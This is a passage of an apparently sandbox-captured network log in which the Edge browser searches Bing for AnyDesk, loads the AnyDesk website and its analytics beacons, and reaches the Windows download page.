%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22notebook%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144461369%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1728144462678%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/GLinkPingPost.aspx?IG=4B36F2F1B3E84114BE48F204E3D5D175&ID=SERP,5132.2&url=https%3A%2F%2Fwww.bing.com%2Fck%2Fa%3F!%26%26p%3Da25e0edae602c85aJmltdHM9MTcyODA4NjQwMCZpZ3VpZD0wNTg3OWFkZC0zZWY4LTZkNTQtMGY1OC04ZmQyM2ZkYjZjNzgmaW5zaWQ9NTEzMg%26ptn%3D3%26ver%3D2%26hsh%3D3%26fclid%3D05879add-3ef8-6d54-0f58-8fd23fdb6c78%26psq%3Danydesk%26u%3Da1aHR0cHM6Ly93d3cuYW55ZGVzay5jb20vIzp-OnRleHQ9RGlzY292ZXIgQW55RGVzaywgdGhlIHNlY3VyZSAmIGludHVpdGl2ZSByZW1vdGUgZGVza3RvcCBzb2Z0d2FyZSwgYW5k%26ntb%3D1

HTTP Response

200
92.123.128.132:443

https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461092%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22609%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461092%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461097%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22correlationId%22%3A%226701644ca2134b4182a14aeef80f0808%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1728144461244%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%226701644ca2134b4182a14aeef80f0808%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1728144461244%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2219041%22%5D%2C%22isWin11OrHigher%22%3A%22false%22%2C%22fullOsBuild%22%3A%2210.0.19041%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461301%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144461355%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

tls, http

msedge.exe

8.7kB
4.0kB
34
35

HTTP Request

GET https://www.bing.com/geolocation/write?isBlocked=true&sid=1FD780794ED66EF4059195764FF56FEA&clientsid=undefined

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461092%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22609%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461092%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461097%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22correlationId%22%3A%226701644ca2134b4182a14aeef80f0808%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1728144461244%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%226701644ca2134b4182a14aeef80f0808%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1728144461244%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2219041%22%5D%2C%22isWin11OrHigher%22%3A%22false%22%2C%22fullOsBuild%22%3A%2210.0.19041%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461301%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144461355%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200
92.123.128.132:443

https://www.bing.com/ck/a?!&&p=a25e0edae602c85aJmltdHM9MTcyODA4NjQwMCZpZ3VpZD0wNTg3OWFkZC0zZWY4LTZkNTQtMGY1OC04ZmQyM2ZkYjZjNzgmaW5zaWQ9NTEzMg&ptn=3&ver=2&hsh=3&fclid=05879add-3ef8-6d54-0f58-8fd23fdb6c78&psq=anydesk&u=a1aHR0cHM6Ly93d3cuYW55ZGVzay5jb20vIzp-OnRleHQ9RGlzY292ZXIgQW55RGVzaywgdGhlIHNlY3VyZSAmIGludHVpdGl2ZSByZW1vdGUgZGVza3RvcCBzb2Z0d2FyZSwgYW5k&ntb=1

tls, http

msedge.exe

14.9kB
9.3kB
41
45

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%227%22}]

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx?

HTTP Response

204

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1728144461382%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221812%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1728144461383%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%222054%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1728144461383%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1728144461486%2C%22Name%22%3A%222%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144462452%2C%22Name%22%3A%22BlockSuccess%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200

HTTP Request

GET https://www.bing.com/ck/a?!&&p=a25e0edae602c85aJmltdHM9MTcyODA4NjQwMCZpZ3VpZD0wNTg3OWFkZC0zZWY4LTZkNTQtMGY1OC04ZmQyM2ZkYjZjNzgmaW5zaWQ9NTEzMg&ptn=3&ver=2&hsh=3&fclid=05879add-3ef8-6d54-0f58-8fd23fdb6c78&psq=anydesk&u=a1aHR0cHM6Ly93d3cuYW55ZGVzay5jb20vIzp-OnRleHQ9RGlzY292ZXIgQW55RGVzaywgdGhlIHNlY3VyZSAmIGludHVpdGl2ZSByZW1vdGUgZGVza3RvcCBzb2Z0d2FyZSwgYW5k&ntb=1

HTTP Response

200
92.123.128.132:443

https://www.bing.com/fd/ls/lsp.aspx

tls, http

msedge.exe

10.7kB
7.0kB
38
40

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.BM%22,%22FID%22:%22CI%22,%22Name%22:%22HV%22}]

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144461369%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204
18.66.248.51:443

https://anydesk.com/_static/img/icons/tiktok-logo-red-06fc15.svg

tls, http2

msedge.exe

221.6kB
28.6MB
4478
20261

HTTP Request

GET https://www.anydesk.com/

HTTP Response

302

HTTP Request

GET https://anydesk.com/en

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/css/anydesk.min-5cb24b.css

HTTP Request

GET https://anydesk.com/_static/video-js/video-js.min-3b9d55.css

HTTP Request

GET https://anydesk.com/_static/css/slick/slick.min-e6e4f1.css

HTTP Request

GET https://anydesk.com/_static/css/slick/slick-theme.min-7c2e6e.css

HTTP Request

GET https://anydesk.com/_static/icons/white/bold/arrow-up-38ccc5.svg

HTTP Request

GET https://anydesk.com/_static/icons/red/bold/phone-circle-186093.svg

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/js/jquery-3.5.1.min-d2cc8d.js

HTTP Request

GET https://anydesk.com/_static/js/popper.min-60cc59.js

HTTP Request

GET https://anydesk.com/_static/js/bootstrap.min-0cc93b.js

HTTP Request

GET https://anydesk.com/_static/js/bootstrap-select/bootstrap-select.min-44f87f.js

HTTP Request

GET https://anydesk.com/_static/js/anydesk.min-a98a7d.js

HTTP Request

GET https://anydesk.com/_static/js/slick.min-3b41b3.js

HTTP Request

GET https://anydesk.com/_static/icons/black/medium/arrow-down-1-38c71c.svg

HTTP Request

GET https://anydesk.com/_static/icons/red/bold/arrow-down-1-13dd01.svg

HTTP Request

GET https://anydesk.com/_static/img/logos/anydesk-logo-white-red-ec4e3a.png

HTTP Request

GET https://anydesk.com/_static/img/logos/anydesk-logo-c0861c.png

HTTP Request

GET https://anydesk.com/_static/fonts/noto-sans/notosans-700.woff2

HTTP Request

GET https://anydesk.com/_static/fonts/noto-sans/notosans-400.woff2

HTTP Request

GET https://anydesk.com/_static/fonts/noto-sans/notosans-300.woff2

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/icons/white/bold/arrow-down-1-ec7f5c.svg

HTTP Request

GET https://anydesk.com/_static/icons/black/bold/keyboard-arrow-top-right-7aaa41.svg

HTTP Request

GET https://anydesk.com/_static/icons/red/bold/headphones-customer-support-human-6e41ee.svg

HTTP Request

GET https://anydesk.com/_static/icons/red/bold/download-bottom-278e26.svg

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/flags/4x3/us.svg

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/img/hero/what-is-new-v8-small-254c07.jpg

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/1-f75772.jpg

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/2-933d52.jpg

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/3-7dfd4f.jpg

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/4-dbb9df.jpg

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/5-3179d1.jpg

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/6-1f1a16.jpg

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/7-a49a86.jpg

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/8-724f09.jpg

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/9-c52bb8.jpg

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/10-d87a03.jpg

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/11-229c76.jpg

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/12-3e4333.jpg

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/13-01dce7.jpg

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/14-ea62c5.jpg

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/15-e9a4dc.jpg

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/16-cf5c4d.jpg

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/17-1b774b.jpg

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/18-a5a96d.jpg

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/19-8fd721.jpg

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/20-3799e1.jpg

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/21-b2d550.jpg

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/22-7d554a.jpg

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/23-eb4707.jpg

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/24-4c645a.jpg

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/25-93b8a4.jpg

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/26-da5cfc.jpg

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/img/sliders/reference-logos/customers/27-f9c6dc.jpg

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/icons/red/bold/house-heart-e0e8b5.svg

HTTP Request

GET https://anydesk.com/_static/icons/red/bold/phone-action-check-1-7c275f.svg

HTTP Response

200

HTTP Request

GET https://anydesk.com/en/downloads/thank-you?dv=win_exe

HTTP Request

GET https://anydesk.com/_static/icons/red/bold/color-brush-paint-e76bfe.svg

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/img/badges/industry-leader-cap-badge-ff7a28.png

HTTP Request

GET https://anydesk.com/_static/img/badges/frontend-runners-badge-ca1e63.png

HTTP Request

GET https://anydesk.com/_static/img/badges/industry-leader-ga-badge-a953a8.png

HTTP Request

GET https://anydesk.com/_static/img/badges/industry-leader-g2-badge-96f1be.png

HTTP Request

GET https://anydesk.com/_static/img/badges/industry-leader-g2-fastest-implementation-badge-072879.png

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/video-js/video.min-1869f1.js

HTTP Request

GET https://anydesk.com/_static/img/favicon/favicon-32x32-d029f3.png

HTTP Request

GET https://anydesk.com/_static/img/icons/windows-logo-red-db34c5.svg

HTTP Request

GET https://anydesk.com/_static/img/icons/mac-logo-208af3.svg

HTTP Request

GET https://anydesk.com/_static/img/icons/android-logo-5e3c95.svg

HTTP Request

GET https://anydesk.com/_static/img/icons/ios-logo-cb4ee2.svg

HTTP Request

GET https://www.anydesk.com/_videos/ad_getting_started.mp4

HTTP Request

GET https://anydesk.com/_static/img/icons/chrome-logo-d001ba.svg

HTTP Request

GET https://anydesk.com/_static/img/icons/raspberrypi-logo-5100f4.svg

HTTP Request

GET https://anydesk.com/_static/img/icons/appletv-logo-1415b6.svg

HTTP Request

GET https://anydesk.com/_static/img/icons/freebsd-logo-13e91e.svg

HTTP Request

GET https://anydesk.com/_static/img/icons/linux-logo-39c4d2.svg

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

206

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://anydesk.com/en/downloads

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/img/videos/anydesk-video-getting-started-with-anydesk-darkmode-c2ab30.jpg

HTTP Request

GET https://anydesk.com/_static/icons/white/light/controls-play-558754.svg

HTTP Request

GET https://anydesk.com/_static/icons/red/light/controls-play-c7b57a.svg

HTTP Request

GET https://anydesk.com/_static/img/videos/address-book-anydesk-e52bd3.jpg

HTTP Request

GET https://anydesk.com/_static/img/videos/secure-usage-anydesk-7c9605.jpg

HTTP Request

GET https://anydesk.com/_static/img/videos/transfer-file-anydesk-2a0ba9.jpg

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://anydesk.com/en/downloads/windows

HTTP Request

GET https://anydesk.com/_static/icons/red/bold/keyboard-arrow-top-right-634d12.svg

HTTP Request

GET https://anydesk.com/_static/img/devices/anydesk-device-windows-04fa31.jpg

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/icons/red/bold/space-rocket-flying-99394c.svg

HTTP Request

GET https://anydesk.com/_static/icons/red/bold/desktop-monitor-settings-aa56ff.svg

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/icons/white/light/controls-play-558754.svg

HTTP Request

GET https://anydesk.com/_static/icons/red/bold/space-rocket-flying-99394c.svg

HTTP Request

GET https://anydesk.com/_static/icons/red/bold/desktop-monitor-settings-aa56ff.svg

HTTP Request

GET https://anydesk.com/_static/icons/red/bold/responsive-design-1-6085ec.svg

HTTP Request

GET https://anydesk.com/_static/img/videos/anydesk-employee-woman-sitting-office-red-65bcea.jpg

HTTP Request

GET https://anydesk.com/_static/icons/white/light/controls-play-558754.svg

HTTP Request

GET https://anydesk.com/_static/icons/red/light/controls-play-c7b57a.svg

HTTP Request

GET https://www.anydesk.com/_videos/in_a_nutshell.mp4

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

206

HTTP Request

GET https://anydesk.com/_static/icons/white/bold/phone-9be7e0.svg

HTTP Request

GET https://anydesk.com/_static/icons/red/bold/arrow-button-right-1-acd1f2.svg

HTTP Request

GET https://anydesk.com/_static/icons/white/bold/arrow-button-right-1-d8f1ad.svg

HTTP Request

GET https://anydesk.com/_static/img/logos/made-in-europe-white-69e1fc.svg

HTTP Request

GET https://anydesk.com/_static/img/badges/google-play-badge-1338ed.svg

HTTP Request

GET https://anydesk.com/_static/img/badges/app-store-badge-2f2fe1.svg

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/icons/white/bold/keyboard-arrow-top-right-5f4184.svg

HTTP Request

GET https://anydesk.com/_static/img/hero/fadeout-stuttgart-opera-mobile-newsletter.jpg

HTTP Request

GET https://anydesk.com/_static/img/icons/tiktok-logo-white.svg

HTTP Request

GET https://anydesk.com/_static/img/icons/twitter-logo-white.svg

HTTP Request

GET https://anydesk.com/_static/img/badges/google-play-badge-1338ed.svg

HTTP Request

GET https://anydesk.com/_static/img/badges/app-store-badge-2f2fe1.svg

HTTP Request

GET https://anydesk.com/_static/img/badges/google-play-badge-1338ed.svg

HTTP Request

GET https://anydesk.com/_static/img/badges/app-store-badge-2f2fe1.svg

HTTP Request

GET https://anydesk.com/_static/icons/white/bold/keyboard-arrow-top-right-5f4184.svg

HTTP Request

GET https://anydesk.com/_static/img/hero/fadeout-stuttgart-opera-mobile-newsletter.jpg

HTTP Request

GET https://anydesk.com/_static/img/icons/tiktok-logo-white.svg

HTTP Request

GET https://anydesk.com/_static/img/icons/twitter-logo-white.svg

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/img/icons/streamline/logos/social-medias/social-media-reddit-white.svg

HTTP Request

GET https://anydesk.com/_static/img/icons/streamline/logos/videos/social-video-youtube-clip-white.svg

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/img/icons/streamline/logos/professional-networks/professional-network-linkedin-white.svg

HTTP Request

GET https://anydesk.com/_static/img/icons/streamline/logos/social-medias/social-media-facebook-white.svg

HTTP Request

GET https://anydesk.com/_static/img/icons/streamline/logos/photos-images/social-instagram-white.svg

HTTP Request

GET https://anydesk.com/_static/css/slick/ajax-loader.gif

HTTP Request

GET https://anydesk.com/_static/img/icons/streamline/video-movies-tv/video-players/controls-play-white.svg

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://anydesk.com/favicon.ico

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/img/favicon/android-chrome-192x192.png

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/img/videos/anydesk-video-getting-started-with-anydesk-darkmode-c2ab30.jpg

HTTP Request

GET https://anydesk.com/_static/img/videos/address-book-anydesk-e52bd3.jpg

HTTP Request

GET https://anydesk.com/_static/img/videos/secure-usage-anydesk-7c9605.jpg

HTTP Request

GET https://anydesk.com/_static/img/videos/transfer-file-anydesk-2a0ba9.jpg

HTTP Request

GET https://anydesk.com/_static/img/badges/industry-leader-cap-badge-ff7a28.png

HTTP Request

GET https://anydesk.com/_static/img/badges/frontend-runners-badge-ca1e63.png

HTTP Request

GET https://anydesk.com/_static/img/badges/industry-leader-ga-badge-a953a8.png

HTTP Request

GET https://anydesk.com/_static/img/badges/industry-leader-g2-badge-96f1be.png

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/img/badges/industry-leader-g2-fastest-implementation-badge-072879.png

HTTP Request

GET https://anydesk.com/_static/icons/red/bold/social-instagram-63cc5c.svg

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/icons/red/bold/social-media-facebook-338621.svg

HTTP Request

GET https://anydesk.com/_static/icons/red/bold/professional-network-linkedin-5d10a1.svg

HTTP Request

GET https://anydesk.com/_static/icons/red/bold/social-video-youtube-clip-57b798.svg

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://anydesk.com/_static/icons/red/bold/social-media-reddit-c78a92.svg

HTTP Request

GET https://anydesk.com/_static/img/icons/twitter-logo-red-03eb4e.svg

HTTP Request

GET https://anydesk.com/_static/img/icons/tiktok-logo-red-06fc15.svg

HTTP Response

200

HTTP Response

200

HTTP Response

200
18.66.248.51:443

www.anydesk.com

tls

msedge.exe

1.9kB
5.1kB
8
9
167.235.224.171:443

ad-wa.anydesk.com

tls

msedge.exe

1.8kB
1.7kB
6
6
167.235.224.171:443

https://ad-wa.anydesk.com/matomo.php?e_c=Downloads&e_a=Download%20-%20Windows&e_n=8.1.0&ca=1&idsite=3&rec=1&r=942202&h=16&m=8&s=27&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&urlref=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=PvlRDg&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D

tls, http2

msedge.exe

15.7kB
248.9kB
143
234

HTTP Request

GET https://ad-wa.anydesk.com/matomo.js

HTTP Request

GET https://ad-wa.anydesk.com/js/container_jWh5YR4y.js

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://ad-wa.anydesk.com/matomo.php?action_name=The%20Fast%20Remote%20Desktop%20Application%20%E2%80%93%20AnyDesk&idsite=3&rec=1&r=310497&h=16&m=7&s=47&url=https%3A%2F%2Fanydesk.com%2Fen&urlref=https%3A%2F%2Fwww.bing.com%2F&_id=&_idn=1&send_image=0&_refts=1728144468&_ref=https%3A%2F%2Fwww.bing.com%2F&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=IWpxdS&pf_net=0&pf_srv=860&pf_tfr=1&pf_dm1=956&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D

HTTP Request

GET https://ad-wa.anydesk.com/plugins/HeatmapSessionRecording/configs.php?idsite=3&trackerid=79xhw7&url=https%3A%2F%2Fanydesk.com%2Fen

HTTP Response

200

HTTP Response

204

HTTP Request

POST https://ad-wa.anydesk.com/matomo.php?e_c=CTA&e_a=Download&e_n=home&ca=1&idsite=3&rec=1&r=485076&h=16&m=7&s=51&url=https%3A%2F%2Fanydesk.com%2Fen&urlref=https%3A%2F%2Fwww.bing.com%2F&_id=&_idn=1&send_image=0&_refts=1728144471&_ref=https%3A%2F%2Fwww.bing.com%2F&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=IWpxdS&uadata=%7B%22brands%22%3A%5B%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%2292%22%7D%2C%7B%22brand%22%3A%22%20Not%20A%3BBrand%22%2C%22version%22%3A%2299%22%7D%2C%7B%22brand%22%3A%22Microsoft%20Edge%22%2C%22version%22%3A%2292%22%7D%5D%7D

HTTP Response

204

HTTP Request

GET https://ad-wa.anydesk.com/plugins/HeatmapSessionRecording/configs.php?idsite=3&trackerid=JWEclr&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe

HTTP Request

POST https://ad-wa.anydesk.com/matomo.php?action_name=Thank%20you%20for%20downloading%20AnyDesk&idsite=3&rec=1&r=911489&h=16&m=7&s=54&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&urlref=https%3A%2F%2Fanydesk.com%2Fen&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=bUEm12&pf_net=0&pf_srv=1619&pf_tfr=1&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D

HTTP Request

POST https://ad-wa.anydesk.com/matomo.php?e_c=Downloads&e_a=Download%20-%20Windows&e_n=8.1.0&ca=1&idsite=3&rec=1&r=462112&h=16&m=7&s=55&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&urlref=https%3A%2F%2Fanydesk.com%2Fen&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=bUEm12&uadata=%7B%22brands%22%3A%5B%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%2292%22%7D%2C%7B%22brand%22%3A%22%20Not%20A%3BBrand%22%2C%22version%22%3A%2299%22%7D%2C%7B%22brand%22%3A%22Microsoft%20Edge%22%2C%22version%22%3A%2292%22%7D%5D%7D

HTTP Request

POST https://ad-wa.anydesk.com/matomo.php?download=https%3A%2F%2Fdownload.anydesk.com%2FAnyDesk.exe&idsite=3&rec=1&r=843874&h=16&m=7&s=55&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&urlref=https%3A%2F%2Fanydesk.com%2Fen&_id=&_idn=1&send_image=0&_refts=0&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720&pv_id=bUEm12&uadata=%7B%22brands%22%3A%5B%7B%22brand%22%3A%22Chromium%22%2C%22version%22%3A%2292%22%7D%2C%7B%22brand%22%3A%22%20Not%20A%3BBrand%22%2C%22version%22%3A%2299%22%7D%2C%7B%22brand%22%3A%22Microsoft%20Edge%22%2C%22version%22%3A%2292%22%7D%5D%7D

HTTP Response

200

HTTP Response

204

HTTP Response

204

HTTP Response

204

HTTP Request

